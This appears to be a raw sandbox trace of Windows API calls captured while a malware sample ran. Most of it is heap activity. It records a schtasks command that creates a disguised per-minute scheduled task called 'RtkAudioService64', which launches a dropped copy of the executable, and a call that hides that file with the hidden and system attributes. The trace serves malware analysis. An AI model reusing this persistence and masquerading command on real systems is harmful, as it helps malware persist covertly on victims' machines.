HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0205.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.236] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0205.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6950 [0205.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efea0 [0205.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xee) returned 0x1304148 [0205.236] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x28) returned 0x1305ff8 [0205.236] ShellExecuteExW (in: pExecInfo=0x7dfa18*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="", lpFile="schtasks", lpParameters="/create /tn RtkAudioService64 /tr \"C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe\" /sc minute /mo 1 /F", lpDirectory="C:\\Windows\\SysWOW64", nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x7dfa18*(cbSize=0x3c, fMask=0x40, hwnd=0x0, lpVerb="", lpFile="schtasks", lpParameters="/create /tn RtkAudioService64 /tr \"C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe\" /sc minute /mo 1 /F", lpDirectory="C:\\Windows\\SysWOW64", nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x3dc)) returned 1 [0205.321] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0205.321] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0205.477] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1304148 | out: hHeap=0x12c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1305ff8 | out: hHeap=0x12c0000) returned 1 [0205.477] GetProcessId (Process=0x3dc) returned 0x1310 [0205.477] CloseHandle (hObject=0x3dc) returned 1 [0205.477] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6950 | out: hHeap=0x12c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a58 | out: hHeap=0x12c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a40 | out: hHeap=0x12c0000) returned 1 [0205.477] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13156f0 | out: hHeap=0x12c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe20 | out: hHeap=0x12c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68a8 | out: hHeap=0x12c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6890 | out: hHeap=0x12c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302258 | out: hHeap=0x12c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe80 | out: hHeap=0x12c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6938 | out: hHeap=0x12c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a70 | out: hHeap=0x12c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68c0 | out: hHeap=0x12c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6920 | out: hHeap=0x12c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ab8 | out: hHeap=0x12c0000) returned 1 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13002c0 | out: hHeap=0x12c0000) returned 1 [0205.478] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.478] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0205.479] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ffed8 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69e0 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe80 [0205.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69e0 | out: hHeap=0x12c0000) returned 1 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff00 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a70 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69e0 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0205.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b69e0 | out: hHeap=0x12c0000) returned 1 [0205.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0205.479] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300090 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a40 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efe20 [0205.479] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a40 | out: hHeap=0x12c0000) returned 1 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13000e0 [0205.479] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6848 [0205.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6890 [0205.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efea0 [0205.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6890 | out: hHeap=0x12c0000) returned 1 [0205.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efea0 | out: hHeap=0x12c0000) returned 1 [0205.480] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e240 [0205.480] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcd0 [0205.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325ea0 [0205.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325ea0 | out: hHeap=0x12c0000) returned 1 [0205.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.480] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcd0 | out: hHeap=0x12c0000) returned 1 [0205.480] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0205.481] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13001d0 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6890 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efea0 [0205.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6890 | out: hHeap=0x12c0000) returned 1 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300338 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6890 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6800 [0205.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efcd0 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1313b60 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69e0 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efcf0 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6800 [0205.481] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efcf0 | out: hHeap=0x12c0000) returned 1 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b69f8 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68c0 [0205.481] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ab8 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efcf0 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd00 [0205.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0205.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68f0 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a28 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6920 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd00 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0205.482] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6938 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6800 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68d8 [0205.482] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd60 [0205.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68d8 | out: hHeap=0x12c0000) returned 1 [0205.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0205.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6950 [0205.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6800 [0205.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0205.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd60 [0205.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0205.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0205.483] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.483] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.483] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fff50 [0205.483] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0205.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0205.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff50 | out: hHeap=0x12c0000) returned 1 [0205.484] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300248 [0205.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68a8 [0205.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.484] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6800 [0205.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd60 | out: hHeap=0x12c0000) returned 1 [0205.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6800 | out: hHeap=0x12c0000) returned 1 [0205.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68a8 | out: hHeap=0x12c0000) returned 1 [0205.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300248 | out: hHeap=0x12c0000) returned 1 [0205.484] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.484] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0205.485] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f00c0 [0205.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0205.485] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f60 | out: hHeap=0x12c0000) returned 1 [0205.485] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00c0 | out: hHeap=0x12c0000) returned 1 [0205.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0205.485] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.485] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f00b0 [0205.485] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260a0 [0205.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0205.486] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300248 [0205.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68a8 [0205.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0205.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd60 [0205.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0040 [0205.486] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x203728) returned 0x359a020 [0205.583] WriteFile (in: hFile=0x2e8, lpBuffer=0x359a020*, nNumberOfBytesToWrite=0x203728, lpNumberOfBytesWritten=0x7dfa44, lpOverlapped=0x0 | out: lpBuffer=0x359a020*, lpNumberOfBytesWritten=0x7dfa44*=0x203728, lpOverlapped=0x0) returned 1 [0205.811] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.811] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff10 [0205.811] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.811] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.811] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff40 [0205.811] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0050 [0205.811] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f60 [0205.811] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0205.811] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.811] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x13002c0 [0205.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68a8 [0205.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0060 [0205.812] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.812] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efed0 [0205.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff70 [0205.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fa0 [0205.812] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e640 [0205.812] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.813] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff40 [0205.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12f0000 [0205.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f00 [0205.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e280 [0205.813] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0205.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300108 [0205.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a10 [0205.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12eff40 [0205.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68a8 [0205.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6a40 [0205.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efee0 [0205.813] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b68d8 [0205.816] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe", nBufferLength=0x7fff, lpBuffer=0x7af458, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\btpanui\\SystemPropertiesPerformance.exe", lpFilePart=0x0) returned 0x3d [0205.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12eff90 [0205.817] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x80) returned 0x148fb50 [0205.817] GetCurrentDirectoryW (in: nBufferLength=0x7fff, lpBuffer=0x7bfa90 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0205.817] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\btpanui\\" (normalized: "c:\\users\\rdhj0cnfevzx\\btpanui")) returned 1 [0205.818] GetFileAttributesW (lpFileName="SystemPropertiesPerformance.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\btpanui\\systempropertiesperformance.exe")) returned 0x20 [0205.818] FindFirstFileW (in: lpFileName="SystemPropertiesPerformance.exe", lpFindFileData=0x7bf1f0 | out: lpFindFileData=0x7bf1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad3ffab, ftCreationTime.dwHighDateTime=0x1d7b452, ftLastAccessTime.dwLowDateTime=0xad3ffab, ftLastAccessTime.dwHighDateTime=0x1d7b452, ftLastWriteTime.dwLowDateTime=0xad3ffab, ftLastWriteTime.dwHighDateTime=0x1d7b452, nFileSizeHigh=0x0, nFileSizeLow=0x203728, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemPropertiesPerformance.exe", cAlternateFileName="SYSTEM~1.EXE")) returned 0x132e600 [0205.819] GetFileAttributesW (lpFileName="SystemPropertiesPerformance.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\btpanui\\systempropertiesperformance.exe")) returned 0x20 [0205.819] SetFileAttributesW (lpFileName="SystemPropertiesPerformance.exe", dwFileAttributes=0x23) returned 1 [0206.182] FindNextFileW (in: hFindFile=0x132e600, lpFindFileData=0x7bf1f0 | out: lpFindFileData=0x7bf1f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xad3ffab, ftCreationTime.dwHighDateTime=0x1d7b452, ftLastAccessTime.dwLowDateTime=0xad3ffab, ftLastAccessTime.dwHighDateTime=0x1d7b452, ftLastWriteTime.dwLowDateTime=0xad3ffab, ftLastWriteTime.dwHighDateTime=0x1d7b452, nFileSizeHigh=0x0, nFileSizeLow=0x203728, dwReserved0=0x0, dwReserved1=0x0, cFileName="SystemPropertiesPerformance.exe", cAlternateFileName="SYSTEM~1.EXE")) returned 0 [0206.182] FindClose (in: hFindFile=0x132e600 | out: hFindFile=0x132e600) returned 1 [0206.182] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0206.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x148fb50 | out: hHeap=0x12c0000) returned 1 [0206.182] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12eff90 | out: hHeap=0x12c0000) returned 1 [0206.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68a8 | out: hHeap=0x12c0000) returned 1 [0206.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a10 | out: hHeap=0x12c0000) returned 1 [0206.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b68d8 | out: hHeap=0x12c0000) returned 1 [0206.183] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6a40 | out: hHeap=0x12c0000) returned 1 [0206.183] HeapFree (in: 